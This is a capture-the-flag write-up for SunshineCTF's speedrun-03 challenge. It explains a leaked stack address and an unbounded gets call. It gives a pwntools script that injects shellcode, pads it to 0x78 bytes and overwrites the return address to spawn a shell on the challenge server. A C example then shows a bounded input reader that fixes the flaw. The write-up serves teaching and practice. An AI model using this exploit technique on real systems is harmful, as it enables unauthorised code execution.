###### tags: `sunshine`

# speedrun-03

- ![](https://i.imgur.com/QqMSexz.png)
- `printf` leaks the address of `local_78`.
- `gets` reads input into the memory at `local_78` with no bound.

```python=
from pwn import *

binary = context.binary = ELF('./chall_03')

if not args.REMOTE:
    p = process(binary.path)
else:
    p = remote('chal.2020.sunshinectf.org', 30003)

# answer the first prompt, then read the leaked stack address from the second
p.sendlineafter(b'Just in time.\n', b'foobar')
p.recvuntil(b"I'll make it: ")
_ = p.recvline().strip()
stack = int(_, 16)
log.info('stack: ' + hex(stack))

# shellcode at the start of local_78, NOP padding up to 0x78 bytes,
# then the leaked address overwrites the saved return address
payload = b''
payload += asm(shellcraft.sh())
payload += (0x78 - len(payload)) * b'\x90'
payload += p64(stack)

p.sendline(payload)
p.interactive()
```

- Write the shellcode first, pad the rest of the input up to 120 (0x78) bytes, then the return address points back to `local_78`, so the function returns into the shellcode.
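The two defects the write-up relies on, the address leak and the unbounded `gets`, are shown below next to a bounded reader that fixes them. This is an added example, not the challenge's source; the buffer size `NAME_SZ` (0x70) and the function name `greet_hardened` are assumptions taken from the 0x78 offset used in the script.

```c
#include <stdio.h>
#include <string.h>

/* local_78 sits 0x70 bytes below the saved rbp, so 0x78 bytes of input reach
 * the saved return address (assumption drawn from the exploit's padding). */
#define NAME_SZ 0x70

/*
 * Pattern described in the write-up (not compiled here):
 *
 *     char local_78[NAME_SZ];
 *     printf("I'll make it: %p\n", local_78);   // leaks the buffer address
 *     gets(local_78);                           // writes past 0x70 bytes
 *
 * The leak removes any need to guess a stack address, and gets() lets the
 * input overwrite the saved return address.
 */

/* Bounded replacement for gets(): stores at most cap-1 bytes of one line,
 * strips the newline, and drains any excess so the next call starts on the
 * next line instead of consuming the leftover bytes. Returns the stored
 * length, or -1 at end of input. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';            /* whole line fit: drop the newline */
    } else {
        int c;                         /* line was too long: discard the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Hardened greeting: no address is printed and the read is bounded. */
int greet_hardened(FILE *in, char *name, size_t cap)
{
    int n = read_line_bounded(name, cap, in);
    if (n < 0)
        return -1;
    printf("Just in time, %s.\n", name);
    return n;
}

int main(void)
{
    char name[NAME_SZ];
    return greet_hardened(stdin, name, sizeof name) < 0;
}
```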